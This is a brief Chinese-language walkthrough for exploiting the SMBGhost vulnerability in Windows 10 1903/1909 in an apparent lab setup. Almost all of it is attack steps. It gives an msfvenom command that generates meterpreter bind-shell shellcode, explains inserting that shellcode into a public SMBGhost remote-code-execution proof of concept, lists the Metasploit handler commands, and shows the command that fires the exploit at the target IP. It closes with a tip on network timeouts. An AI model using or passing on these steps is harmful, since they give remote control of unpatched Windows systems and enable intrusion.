環境:
目標:192.168.107.74,windows10專業版 1903
攻擊者:192.168.103.61
影響版本:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)對應補丁:
KB4551762
第一步:
使用MSF生成python版本反彈的shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp lport=2006 -f py -o evil.py
第二步:
將evil.py腳本中的payload替換掉SMBGhost_RCE_PoC文件夾下,exploit.py中的USER_PAYLOAD部分;同時用MSF開啓正向監聽:
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.107.74
set lport 2006
run
第三步:
#攻擊,腳本打開目標2006端口,從而msf能連上去。
python3 exploit.py -ip 192.168.107.74
#遇到的小問題:當環境處於無線局域網,會一直報socket超時錯誤,當環境處於有線局域網,則正常。